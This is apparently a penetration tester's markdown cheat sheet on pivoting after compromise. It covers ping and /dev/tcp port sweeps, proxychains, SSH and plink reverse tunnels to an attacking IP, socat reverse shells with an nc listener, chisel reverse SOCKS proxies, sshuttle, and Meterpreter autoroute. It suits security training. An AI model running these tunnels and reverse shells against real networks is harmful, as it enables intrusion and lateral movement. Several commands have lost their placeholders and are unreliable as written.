# Pivoting * Tunnelling/Proxying * Port Forwarding ## Enumeration ### Using material found on the machine and preinstalled tools * `arp -a` * `/etc/hosts` or `C:\Windows\System32\drivers\etc\hosts` * `/etc/resolv.conf` * `ipconfig /all` * `nmcli dev show` ### Statically compiled tools](https://github.com/andrew-d/static-binaries.git) ### Scripting Techniques ```sh for i in {1..255}; do (ping -c 1 192.168.0.${1} | grep "bytes from" &); done for i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done ``` * Using local tools through a proxy like `nmap` ## Tools ### Enumerating a network using native and statically compiled tools ### Proxychains / FoxyProxy * Proxychains, e.g. scan target via nmap, or connect via nc thorugh jump server ```sh proxychains nc proychains nmap proxychains ssh user@$TARGET_IP proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS ``` * Use `/etc/proxychains.conf` or `./proxychains.conf`containing: ``` [ProxyList] # add proxy here ... # meanwhile # defaults set to "tor" socks4 127.0.0.1 9050 #socks5 127.0.0.1 1337 # proxy_dns ``` * FoxyProxy, choose proxy type, proxy IP and port in settings ### SSH port forwarding and tunnelling (primarily Unix) * LocalPortForwarding ```sh ssh -L :: @ -fN ``` * Dynamic Port Forwarding ```sh ssh -D @ -fN ``` * Reverse Proxy ```sh ssh -R LOCAL_PORT:TARGET_IP:TARGET_PORT USERNAME@ATTACKING_IP(local) -i KEYFILE -fN ``` ### plink.exe (Windows) * [latest version](https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html) ```sh cmd.exe /c echo y | .\plink.exe -R :: @ -i -N ``` * Key generation ```sh puttygen -o key.ppk ``` * Circumvention, described by [U.Y.](https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d) ```sh echo y | &.\plink.exe -ssh -l -pw -R ::127.0.0.1: ``` ### Socat * Reverse shell on target via ```sh ./socat tcp-l:8000 tcp::443 & ``` * Attacking bind shell ```sh sudo nc -lvnp 443 ``` * Relay via Jumpserver ```sh ./socat tcp-l:33060,fork,reuseaddr tcp::3306 & ``` * Quiet Port Forwarding * On attacker ```sh socat tcp-l:8001 tcp-l:8000,fork,reuseaddr & ``` * On relay server ```sh ./socat tcp::8001 tcp::,fork & ``` * Open `localhost:8000` * Processes are backgrounded via `&`. Therefore, the process can be quit by using the corresponding bg number like `kill %1`. ### Chisel * **Does not require SSH on target** * Reverse Proxy * Bind port on attacker ```sh ./chisel server -p --reverse & ``` * Reverse port on target/proxy ```sh ./chisel client : R:socks & ``` * `proxychains.conf` contains ```sh [ProxyList] socks5 127.0.0.1 ``` * Forward SOCKS Proxy * Proxy/compromised machine ```sh ./chisel server -p --socks5 ``` * On attacker ```sh ./chisel client : :socks ``` * Remote Port Forward * On attacker ```sh ./chisel server -p --reverse & ``` * On forwarder ```sh ./chisel client : R::: & ``` * Local Port Forwarding * On proxy ```sh ./chisel server -p ``` * On attacker ```sh ./chisel client : :: ``` ### sshuttle * `pip install sshuttle` * `sshuttle -r @ ` * or automatically determined ```sh sshuttle -r @ -N ``` * Key based auth ```sh sshuttle -r @ --ssh-cmd "ssh -i " ``` * Exclude servers via `-x`, for example the target/gateway server ### Meterpreter * Meterpreter with payload `set payload linux/x64/meterpreter_reverse_tcp` and ```sh portfwd add -l 22 -p 22 -r 127.0.0.1 ``` #### Meterpreter Auto Routing * Upload payload and catch it with `multi/handler` ``` background use post/multi/manage/autoroute set session 1 set subnet <10.0.0.0> run ``` #### Meterpreter Proxy Routing * Specify socks proxy via ```sh use auxiliary/server/socks_proxy ```